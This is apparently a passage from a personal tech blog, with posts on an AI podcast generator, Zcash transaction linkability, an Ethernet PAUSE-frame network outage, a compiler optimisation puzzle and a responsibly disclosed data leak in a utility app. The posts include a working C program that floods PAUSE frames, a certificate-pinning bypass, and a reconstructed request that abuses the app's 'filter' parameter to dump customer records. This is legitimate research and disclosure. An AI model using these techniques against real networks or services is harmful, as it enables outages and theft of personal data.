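# Made-up podcast situation; check the model card for the exact input format
situation = "Two friends are recording a podcast about the first chapter of a novel."
instruction = "You are Alice and you are talking to Bob."
history = ["Bob: So, what happens in chapter one?"]

prompt = situation + " <sep> " + instruction + " <sep> " + " <turn> ".join(history)
inputs = tokenizer(prompt, return_tensors="pt").to(model.device)
output = model.generate(**inputs, max_new_tokens=64, do_sample=True, top_p=0.95)
print(tokenizer.decode(output[0], skip_special_tokens=True))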

Lo and behold, yacine had similar inklings and while I was working on my project released scribepod, powered by the 900-pound-gorilla that is text-davinci-003. This was partial vindication — yes, it could be done — but also somewhat deflating since it meant it would need to be tethered to an API.

Or must it be? COSMO can make the dialogue — but it needs some information on what to say. The critical task here is summarization; taking the raw novel text and distilling it into meaningful pieces that can be used as context when prompting the dialogue generating LM. Peter Szemraj has been doing fantastic open source work in this space, and I decided to use his long-t5-tglobal-xl-16384-book-summary model (again a fine-tuning of T5 — are we noticing a pattern here? Thanks Google!!!)
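
Running the summarizer is a one-liner with the transformers pipeline; a rough sketch, assuming the hub id pszemraj/long-t5-tglobal-xl-16384-book-summary and illustrative generation settings:

from transformers import pipeline

summarizer = pipeline("summarization", model="pszemraj/long-t5-tglobal-xl-16384-book-summary")

# A chunk of the novel; the long-context T5 variant accepts up to ~16k tokens at once
chapter = open("war_of_the_worlds_chapter1.txt").read()
print(summarizer(chapter, max_length=256, min_length=64)[0]["summary_text"])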

Okay, so I had an open source way to summarize text and generate dialogue. How about a bit of flair? Given the incredible results that diffusion models have had in image generation, I wanted to leverage these to give the podcast some imagery. My idea was a player for the podcast that would scroll between images generated from descriptions of the scene that the podcast participants were talking about. To do this, I needed to automatically generate prompts to Stable Diffusion models (Greg Rutkowski here we come).

The ChatGPT-solves-everything answer is to simply few-shot it with some examples of what you’d like using something like LangChain and let those 175 billion parameters work their magic. To maintain our open source purity I chose FLAN-T5 (paper; model), the instruction-tuned version of T5. FLAN-T5 produced very good, although admittedly inferior, results. Alas, such is the price we must pay (or not pay in this case).

Once the image descriptions were created it was simply a matter of generating a prompt and letting a Stable Diffusion model like Dreamlike Diffusion do the rest!
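
Going from a description to an image with diffusers looks something like this sketch; the hub id for Dreamlike Diffusion and the example prompt are assumptions.

import torch
from diffusers import StableDiffusionPipeline

pipe = StableDiffusionPipeline.from_pretrained(
    "dreamlike-art/dreamlike-diffusion-1.0",   # assumed hub id for Dreamlike Diffusion
    torch_dtype=torch.float16,
).to("cuda")

# Made-up scene description of the kind produced by the FLAN-T5 prompt generator
prompt = "a Martian tripod looming over a ruined Victorian street at dusk, dramatic lighting"
image = pipe(prompt, num_inference_steps=30).images[0]
image.save("scene.png")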

Images generated for H. G. Wells’ “The War of the Worlds”

The final piece was to make actual audio. I cribbed yacine’s use of TorToiSe, and at last the amalgamation was complete — literAI was born! You can try out the visual player here.


I’ll save my poetic waxing about AI for another time. Rather, I’d like to simply appreciate the work of the countless researchers who contributed to getting us to the current SOTA. It’s frankly bewildering. I’m looking forward to where we’re going — and being a builder of it along the way.


On the linkability of Zcash transactions

By: jeffq
December 4, 2017 at 22:31

Today I’m publishing a paper (PDF, arXiv) I wrote about the linkability of certain types of Zcash transactions. I’m also publishing a list of round-trip transactions generated as part of the research. The code used is up on GitHub (parser, database generator). If you don’t feel like reading the whole thing, there’s a summary below!

Note: A draft of the paper was shared with the Zcash Company before publishing. They have published a blog regarding the results.


As you probably know, Bitcoin is a “transparent ledger”, which means that it is very simple (and in fact, essential to verifying its correctness) to trace the flow of coins from one address to another. In this way, the transactions are “linkable”. Zcash is a fork of Bitcoin that adds a new type of address called a shielded address, or “z-addr”. Transactions involving z-addrs use a special type of cryptography (zk-SNARKs) to obscure the parties and amounts of transactions.

The use of z-addrs is optional. Transparent addresses, or “t-addrs”, are essentially equivalent to Bitcoin addresses. Coins can be sent between z-addrs and t-addrs. However, when doing a mixed transaction (t → z or z → t) the amount of the transaction is public, even while the corresponding z-addr is not. Zcash has noted that this introduces the potential for linkability.

To begin, I looked into exactly how prevalent the use of z-addrs really is. I found that only 19.6% of transactions involve any use of a z-addr. Furthermore, 98.1% of these transactions performed either a t → z transaction or a z → t transaction. The conclusion is that the use of true private transactions (z → z) is fairly rare.

Coins that are controlled by z-addrs are said to be in the “shielded pool”. I found that this pool is relatively shallow; on average only 3.5% of the available coins are in the shielded pool.

The size of the shielded pool over time

With 19.6% of transactions making use of z-addrs, an average of only 3.5% of coins in the shielded pool suggests that coins that enter the pool are soon sent back to t-addrs. Since the amounts of these types of transactions are public, we can look for pairs of transactions (t → z and then z → t) where the same number of coins are sent to the pool and then back to a t-addr. I called these transactions round-trip transactions.

Improper use of z-addrs can lead to transaction linkability. From https://z.cash/blog/transaction-linkability.html

I searched the entire Zcash blockchain, looking for cases where t → z and z → t transactions had exactly the same number of coins transferred. To reduce false positives, I restricted the search to only those cases where the match was globally unique throughout the history of Zcash, e.g. if a t → z transaction was for 3.87514 ZEC, I checked whether there was exactly one z → t transaction later on the blockchain for 3.87514 ZEC as well.
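
In pseudocode-ish Python, the matching rule amounts to the sketch below, shown on made-up transactions; the real search runs over the parsed blockchain database from the linked GitHub repositories.

from collections import defaultdict

# Each entry is (block_height, amount_in_zec); made-up data for illustration
t_to_z = [(100, 3.87514), (120, 1.0), (150, 2.5)]
z_to_t = [(140, 3.87514), (160, 1.0), (161, 1.0)]

tz_by_amount = defaultdict(list)
for height, amount in t_to_z:
    tz_by_amount[amount].append(height)
zt_by_amount = defaultdict(list)
for height, amount in z_to_t:
    zt_by_amount[amount].append(height)

# A round-trip transaction requires a globally unique amount on both sides,
# with the z -> t leg appearing later in the chain than the t -> z leg
round_trips = [
    (tz_by_amount[amt][0], zt_by_amount[amt][0], amt)
    for amt in tz_by_amount
    if len(tz_by_amount[amt]) == 1
    and len(zt_by_amount.get(amt, [])) == 1
    and zt_by_amount[amt][0] > tz_by_amount[amt][0]
]
print(round_trips)   # [(100, 140, 3.87514)]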

The motivation for this search was a suspicion that many people attempt to (for lack of a better word) launder their Zcash through the shielded pool. Since no exchanges or web wallets support z-addrs, users are forced to operate mainly through t-addrs if they want to use their coins. However, if they wish to obscure the source of these coins, they may pass them through the shielded pool. But, if they are not careful and make the amounts identical, the transaction may not be as private as they thought.

(Left) Stats on RTTs found (Right) Top 250 t → z transactions

I was able to find 10,075 round-trip transactions (as of block 196304). 96% of these were between transactions that appeared within two hours of each other on the blockchain. This is strong circumstantial evidence that the transactions are linked. The transactions themselves are available here.

The RTTs surprisingly accounted for 31.5% of all coins that ever entered the shielded pool. In fact, 236 of the top 250 t → z transactions (by amount) were involved in a RTT. After investigating the addresses involved it appears many Zcash mining pools are engaging in RTTs before distributing their miner rewards. The members of the mining pool may be under the impression that the source of their coins is private, but their privacy is contingent on the sender of the coins having the foresight to not perform a RTT.

nds4droid Privacy Policy

By: jeffq

nds4droid does not collect or transmit any personal or sensitive user data. The android.permission.RECORD_AUDIO permission is used only to emulate the microphone on the Nintendo DS, which some games use.

Obscure Ethernet for $200 please, Alex: The Ethernet PAUSE frame

By: jeffq
August 22, 2016 at 17:55

This is a bizarre one. It all started when the internet seemed to go out at my house. My desktop, phone, TV, everything stopped working. The usual solution at a time like this is to power cycle the modem and router. While this fixed the situation temporarily, soon after the problem returned. What made me think this was more than just ISP flakiness was that for some reason Chrome actually locked up: good ol’ Windows “this program stopped responding”. So, like any enterprising engineer, I busted open Wireshark.

Some odd frames

After some clever deductive reasoning, a.k.a. randomly unplugging cables from the router, I determined that my TV was sending these mystery frames (yes, my TV — I have a Sony X805D Android TV). After power cycling the TV the problem went away, but of course I wanted to figure out what was actually happening. You’d be forgiven if the above frames aren’t immediately recognizable — their definition is buried deep in Appendix 31B of the IEEE 802.3 Ethernet standard.

The type of an Ethernet frame is determined by its EtherType, which is a two-byte identifier that comes after the two six-byte MAC addresses denoting source and destination. The mystery frame’s EtherType was 0x8808, which is for Ethernet flow control.

The very existence of Ethernet flow control may come as a shock, especially since protocols like TCP have explicit flow control mechanisms, presumably to compensate for Ethernet’s lack of one. However, on page 752 of the Ethernet spec we find a section dedicated to (rudimentary) flow control. The frame structure is fairly bare-bones: a two byte “opcode”, which in this case is 0x0001 for “PAUSE” and a two byte “pause_time”, denoting increments of 512 bit times (here’s a great diagram of the frame).
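
For reference, decoding those fields from a captured frame takes only a few lines. Here is a quick Python sketch (the example bytes mirror the frame transmitted by the program below):

import struct

def parse_pause(frame: bytes):
    dst, src = frame[0:6], frame[6:12]
    ethertype = struct.unpack("!H", frame[12:14])[0]
    if ethertype != 0x8808:                      # MAC control frames only
        return None
    opcode, pause_time = struct.unpack("!HH", frame[14:18])
    if opcode != 0x0001:                         # 0x0001 = PAUSE
        return None
    return dst.hex(":"), src.hex(":"), pause_time  # pause_time is in units of 512 bit times

# PAUSE frame to the reserved multicast address with the maximum pause_time of 65535
frame = bytes.fromhex("0180c2000001") + bytes(6) + bytes.fromhex("88080001ffff") + bytes(42)
print(parse_pause(frame))   # ('01:80:c2:00:00:01', '00:00:00:00:00:00', 65535)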

To test out the behavior of pause frames more thoroughly I wrote a simple libpcap (or WinPcap) program that transmits a PAUSE frame every ten milliseconds.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <pcap/pcap.h>

#define SLEEP_TIME_MS 10 /* transmit a PAUSE frame every ten milliseconds */

int main(int argc, char **argv)
{
    unsigned char PAUSE_FRAME[60] =
    {
        0x01, 0x80, 0xC2, 0x00, 0x00, 0x01, /* Destination MAC: Spanning tree for bridges   */
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* Source MAC:      Null                        */
        0x88, 0x08,                         /* EtherType:       MAC control                 */
        0x00, 0x01,                         /* OpCode:          Pause                       */
        0xFF, 0xFF,                         /* pause_time:      65535                       */
                                            /* 42 bytes of padding                          */
    };

    pcap_t *fp;                      /* handle declared here; opening the interface omitted */

    /* OMITTED: OPEN UP THE INTERFACE */

    memset(PAUSE_FRAME + 18, 0, 42); /* fill padding with 00 */

    while (1)
    {
        if (pcap_sendpacket(fp, PAUSE_FRAME, sizeof(PAUSE_FRAME)) != 0)
        {
            fprintf(stderr, "Error sending frame: %s\n", pcap_geterr(fp));
            break;
        }

        usleep(SLEEP_TIME_MS * 1000);
    }

    pcap_close(fp);
    return 0;
}

Sure enough, sending this frame repeatedly killed all traffic on my home network. (You can check out the full code on GitHub). What’s interesting is that this may have arisen from a bug in my home router (TP-Link AC750 Archer C2 running firmware 0.9.1.3.2). According to the Ethernet spec (31B.1):

The globally assigned 48-bit multicast address 01-80-C2-00-00-01 has been reserved for use in MAC Control PAUSE frames for inhibiting transmission of data frames from a DTE in a full duplex mode IEEE 802.3 LAN. IEEE 802.1D-conformant bridges will not forward frames sent to this multicast destination address, regardless of the state of the bridge’s ports, or whether or not the bridge implements the MAC Control sublayer.

It would appear that there is a clause that specifically attempts to deal with this scenario: nodes sending a PAUSE message to the special multicast address 01:80:C2:00:00:01 are instructing the switch to not send them any more frames. My switch seems to honor this, but also forwards the frames to the other nodes on the network, in effect telling THEM to pause in sending frames, which would explain the observed behavior.

I did some digging — my router uses a MediaTek MT7620A router SoC which relies on a Realtek RTL8367RB to perform switch duties. Unfortunately I couldn’t find the data sheet for this specific chip, although the source code for the router is GPL, so the driver itself is perusable. A data sheet for the RTL8366 (a 6/9 port version of the chip) says on page 22:

Frames with group MAC address 01-80-c2-00-00-01 (802.3x Pause) and 01-80-c2-00-00-02 (802.3ad LCAP) will always be filtered. MAC address 01-80-c2-00-00-03 will always be forwarded. This function is controlled by pin strapping of EN_MLT_FWD (pin 32) upon power reset. After power on, the configuration may be changed by MLTID_ST[15:0][1:0] in Register MCPCR0-1 (0x000F – 0x0010).

Have we reached the end of the road? The above seems to suggest that the forwarding of PAUSE frames is controlled both by a pin and a register on the Ethernet switch chip. It would appear on my router this specific (standard conformant) feature was accidentally disabled, either by a floating pin or a zeroed out register leading to a “frame of death” that was forwarded by my switch, killing the network. It’s amazing what you find when you dig!


When code is suspiciously fast: adventures in dead code elimination

By: jeffq
May 5, 2016 at 16:46

Part of a recent assignment for one of my classes involved calculating the Fibonacci sequence both recursively and iteratively and measuring the speed of each method. (BONUS: For a fun diversion, here is a paper I wrote about using the Golden Ratio, which is closely related to the Fibonacci sequence, as a base for a number system). In addition, we were supposed to pass the actual calculation as a function pointer argument to a method that measured the execution time.

The task was fairly straightforward, so I fired up Visual Studio 2015 and got to work. I usually target x64 during development (due to some misguided belief that the code will be faster), and when I ran the code in release mode I received the following output as the time needed to calculate the 42nd Fibonacci number:

Recursive: 0.977294758 seconds
Iterative: 0.000000310 seconds

Since calculating $F_{42}$ through naive recursion requires ~866 million function calls, this pretty much jived with my expectations. I was ready to submit the assignment and close up shop, but I decided it’d be safer to submit the executable as a 32-bit application. I switched over to x86 in Visual Studio, and for good measure ran the program again.

Recursive: 0.000000000 seconds
Iterative: 0.000000311 seconds

Well then. That was… suspiciously fast. For reference, here is (a stripped down version of) the code I was using.

#include <iostream>
#include <iomanip>
#include <chrono>
#include <cassert>

constexpr int MAX_FIB_NUM = 42;
constexpr int F_42 = 267914296;

int fib_recursive(int n)
{
	if (n < 2)
		return n;
	else
		return fib_recursive(n - 1) + fib_recursive(n - 2);
}

int fib_iterative(int n)
{
	int f_1 = 1, f_2 = 0;

	for (int i = 1; i < n; ++i)
	{
		int tmp = f_1;
		f_1 = f_1 + f_2;
		f_2 = tmp;
	}

	return f_1;
}

double measure_execution_time(int(*func)(int))
{
	auto start = std::chrono::high_resolution_clock::now();
	int ret = func(MAX_FIB_NUM);
	auto end = std::chrono::high_resolution_clock::now();

	assert(ret == F_42);

	return std::chrono::duration<double>(end - start).count(); //convert to fractional seconds
}

int main(int argc, char** argv)
{
	auto recursive_duration = measure_execution_time(fib_recursive);
	auto iterative_duration = measure_execution_time(fib_iterative);

	std::cout << std::setprecision(9) << std::fixed; //up to nanoseconds

	std::cout << "Recursive: \t" << recursive_duration << " seconds " << std::endl;
	std::cout << "Iterative: \t" << iterative_duration << " seconds " << std::endl;

 	return 0;
}

In debug mode the code took the expected amount of time; only the release build targeting x86 was exhibiting the seemingly blazingly fast performance. What was happening here? Some constexpr magic resulting in the compiler precomputing the answer? An overly aggressive reordering of the now() calls?

To figure out the answer I opened the executable in IDA and started poking around.

Start of main() on x86 generated by Visual Studio 2015

No wonder the code took almost no time — we’re simply measuring the time it takes to execute a single lea instruction! The next section of code appeared to be the fib_iterative function:

Inlined fib_iterative function

It would appear that a function pointer is no barrier to Visual Studio’s inlining; measure_execution_time never explicitly appears as a discrete subroutine. Regardless, the inlined assembly for fib_iterative is about as straightforward as possible. Over on x64 the code appears even simpler (all code was compiled with /O2).

Start of main() on x64 generated by Visual Studio 2015

The function pointer inlining is gone, replaced with the more or less expected code, i.e. load the address of the function into an argument register and then call measure_execution_time.

So what’s the deal here? Where the heck did fib_recursive go on x86? I believe what we’re seeing is an unexpected application of dead code elimination. On Visual Studio the assert macro is #define assert(expression) ((void)0) in release mode, meaning the check that the return is equal to F_42 turns into nothing!
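
To make that concrete, here is a tiny standalone sketch (mine, not part of the assignment code) showing that once NDEBUG is defined, as it is in a default Release configuration, the asserted expression is never even evaluated:

#define NDEBUG              // comment this out to restore the checking behaviour
#include <cassert>
#include <cstdio>

static int times_evaluated = 0;

int check()
{
	++times_evaluated;      // observable side effect
	return 1;
}

int main()
{
	assert(check() == 1);   // with NDEBUG this whole statement becomes ((void)0)
	std::printf("check() was evaluated %d time(s)\n", times_evaluated); // prints 0
	return 0;
}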

Since the return value of fib_recursive now isn’t used, and the function itself simply does trivial math (besides calling itself), the compiler has decided it serves no purpose. What’s interesting is that the compiler did not make the same determination for fib_iterative. Given the choice between the two, I would have assumed that fib_iterative, with its constant-sized loop, would be easier to analyze than the recursive structure of fib_recursive. What’s even weirder is that this only happens on x86, not x64.

After modifying the code to display the result of the functions with std::cout the problem went away. The moral of the story is that if you’re doing performance unit testing, make sure that your functions touch the outside world in some way; asserts aren’t always enough. Otherwise, the compiler may spontaneously decide to eliminate your code altogether (and it may be platform dependent!), giving the illusion of incredible speed and cleverness on your part 🙂
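
For illustration, a minimal sketch of that kind of fix (not the exact code from the assignment; it reuses the includes and the MAX_FIB_NUM constant from the listing above) is to print the measured function’s return value, giving the call an observable side effect the optimizer can’t discard:

double measure_execution_time(int(*func)(int))
{
	auto start = std::chrono::high_resolution_clock::now();
	int ret = func(MAX_FIB_NUM);
	auto end = std::chrono::high_resolution_clock::now();

	std::cout << "result: " << ret << std::endl; // the result now escapes, so the call isn't dead code

	return std::chrono::duration<double>(end - start).count(); //convert to fractional seconds
}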

CVE-2016-1562: Unauthenticated “filter” parameter leads to customer information leak in the DTE Energy Insight app

By: jeffq
March 10, 2016 at 04:26

BACKGROUND

Here in southeast Michigan nearly all of our electricity (and a good chunk of our natural gas) comes from DTE Energy, which serves 2.1 million people in the greater Metro Detroit area. DTE recently upgraded most of their electricity meters to ZigBee-enabled smart meters, and as part of this rollout they released the DTE Energy Insight app which allows customers to view their energy usage, set targets, and earn a host of achievements (no Steam cards sadly) when meeting different energy goals. In addition, at no charge DTE sends customers an “Energy Bridge”, a small device that connects to a home network and monitors the ZigBee messages generated by a smart meter to give real-time energy consumption information.

The DTE Energy Insight app and the Energy Bridge device

Given my curious nature I decided to poke around to discover how exactly the app and the Energy Bridge worked. This post is about a vulnerability in the app itself (although I’ve been tinkering with my Ettus Research B200 SDR to intercept the ZigBee messages as well).

METHODOLOGY

By rooting my phone and using ProxyDroid to forward all traffic to a mitmproxy instance running on my PC, I deduced that the Insight app was attempting to connect to apps.dteenergy.com via TLS (non-TLS connections were rejected). Even though I had the certificate authority that mitmproxy generates installed in the trust store on my phone, the app refused to communicate through the TLS proxy, so naturally I suspected some form of certificate pinning or a custom trust store was being used by the app.

Decompiling the app’s APK with Apktool proved a somewhat frustrating experience; the app appeared to have been run through an obfuscator. The res/raw/ directory in the APK did provide hints, though; the app contained two .bks (BouncyCastle keystore) files. Unfortunately, the keystores were password protected. However, the resource IDs for these files gave me an anchor in the code, and I was able to follow the decompiled code to the function that loads the keystores through javax.net.ssl.TrustManagerFactory.

Decompilation of .bks loading procedure

res/raw/dtecomodo.bks had resource ID 0x7f070009, and the decompilation clearly showed that the password “vectorform” was being used. This code existed in the com.vectorform.wattsonandroid.c.a class, which let me know that Vectorform developed the app for DTE.

dtecomodo.bks contents

The keystore itself contained a certificate chain for the AddTrust External CA Root as well as the Comodo High-Assurance Secure Server CA, an intermediate authority. So, the Insight app wasn’t specifically pinning to a certificate for the API endpoint, but it enforced that the certificate that apps.dteenergy.com presented must be issued by the specific AddTrust/Comodo chain given in the file. To bypass this restriction I added the mitmproxy root CA to the keystore and recompiled the app with Apktool.

Modified dtecomodo.bks file

The modified APK communicated through the mitmproxy — success!

mitmproxy capture of Insight app traffic

Every API endpoint required an HTTP Basic Access Authentication header containing the DTE customer’s username and password (the same credentials they use to access their online billing). The IdentityService endpoint returned a dteSAML variable, which needed to be included in all requests to endpoints that queried the customer’s actual energy usage. Presumably this is a SAML token, which likely gets passed along to the backend DTE servers that actually monitor the customer’s usage. This led me to believe that data for the application is managed separately from the actual usage data. This was further confirmed by investigating the api/Customer endpoint, which returned a DTEID that could be used in some requests; dteSAML was only needed when querying actual usage data.

Basic tests such as requesting information for a different DTEID via a GET to api/Customer showed that most endpoints were correctly checking access controls. Of interest was the api/Notification endpoint, which accepted a curious filter parameter. Un-URL-encoded, the parameter read as follows:

DTEID eq <dteid> and IsRead eq false and NotificationType.IsNotification eq true

This suggested that the filter parameter accepted arbitrary queries against a JSON-like database and returned the results. I wrote a script to request arbitrary filter parameters; the only authorization needed was the username and password for my DTE account passed as a Basic Access Authentication header.

VULNERABILITY

Sample result from a modified filter parameter

As suspected, the filter parameter was essentially a read-only SQL injection attack; the server would respond with whatever was asked of it. Thus, a filter of Customer.Zipcode eq 48346 would return the app’s database for every user with a 48346 ZIP code. In addition to api/Notification there were a number of other endpoints that also accepted a filter parameter, e.g. api/CustomerProject. This resulted in the compromise of the entire database.
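
For illustration, here is a hypothetical reconstruction of such a request using libcurl; the host, endpoint, and filter parameter names come from the article, but the exact URL layout is a guess, the credentials are placeholders, and this is not the original script (the hole has since been fixed, per the timeline below):

#include <curl/curl.h>
#include <iostream>
#include <string>

// libcurl write callback: append the response body to a std::string
static size_t write_cb(char* data, size_t size, size_t nmemb, void* userdata)
{
	static_cast<std::string*>(userdata)->append(data, size * nmemb);
	return size * nmemb;
}

int main()
{
	curl_global_init(CURL_GLOBAL_DEFAULT);
	CURL* curl = curl_easy_init();
	if (!curl)
		return 1;

	// Attacker-chosen filter: return the row for every customer in one ZIP code
	const char* filter = "Customer.Zipcode eq 48346";
	char* encoded = curl_easy_escape(curl, filter, 0);
	std::string url = std::string("https://apps.dteenergy.com/api/Notification?filter=") + encoded;
	curl_free(encoded);

	std::string response;
	curl_easy_setopt(curl, CURLOPT_URL, url.c_str());
	curl_easy_setopt(curl, CURLOPT_HTTPAUTH, (long)CURLAUTH_BASIC);               // Basic Access Authentication
	curl_easy_setopt(curl, CURLOPT_USERPWD, "my-dte-username:my-dte-password");   // placeholder credentials
	curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, write_cb);
	curl_easy_setopt(curl, CURLOPT_WRITEDATA, &response);

	CURLcode res = curl_easy_perform(curl);
	if (res == CURLE_OK)
		std::cout << response << std::endl;        // whatever rows the backend matched
	else
		std::cerr << curl_easy_strerror(res) << std::endl;

	curl_easy_cleanup(curl);
	curl_global_cleanup();
	return 0;
}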

CONCLUSION

This xkcd needs no introduction

Classic SQL injection attacks rely on string manipulation to escape the value of a parameter and modify the behaviour of the underlying query. While not as serious as a full injection vulnerability (which would allow us to invoke the ghost of Bobby Tables), allowing an authenticated user to specify the full parameter to a WHERE-like clause is nearly as dangerous (especially if the table contains personal data on every user of your app!).

If I may editorialize, DTE Energy Insight is a pretty slick app. It’s clear that a lot of effort was put into its user interface and design. Although this article doesn’t cover the Energy Bridge device, my tinkering with it has shown me that the engineers who worked on it were security conscious. The endpoints that deal with customer energy information require a SAML token, and those such as api/Customer don’t return information if a DTEID different from that of the logged-in user is requested.

The filter parameter was likely a dirty hack — I’m sure there’s an engineer somewhere who cringed when they wrote it. Although the app is relatively obscure in the grand scheme of things, the personal information of perhaps hundreds of thousands of users will always be a juicy enough target to warrant malicious activity. Techniques such as certificate pinning or custom trust chains protect against nefarious men-in-the-middle; they can’t guarantee the secrecy of an insecure API.

RESPONSIBLE DISCLOSURE
  • Jan 16, 2016: Vulnerability discovered
  • Jan 28, 2016: Private disclosure to [email protected] and [email protected]
  • Jan 29, 2016: Disclosure to CERT
  • Feb 3, 2016: CERT confirmed reception of report by DTE
  • Feb 29, 2016: CERT reported that DTE fixed the vulnerability
  • Feb 29, 2016: Fix confirmed
  • Mar 1, 2016: Public disclosure scheduled for Mar 3, 2016
  • Mar 2, 2016: DTE requested disclosure be pushed back to Mar 10, 2016
  • Mar 10, 2016: Public disclosure (VU#713312, CVE-2016-1562)

nds4droid release 47

By: jeffq
February 11, 2016 at 21:48

2016 brings us an update for nds4droid! Nathaniel D. was nice enough to provide a new German translation. In addition I went ahead and converted the code to an Android Studio project and moved everything away from Sourceforge (15 years too late, amirite) and over to GitHub. The code can now be found there: https://github.com/jquesnelle/nds4droid.

Go ahead and grab the latest APK or get it straight from Google Play.
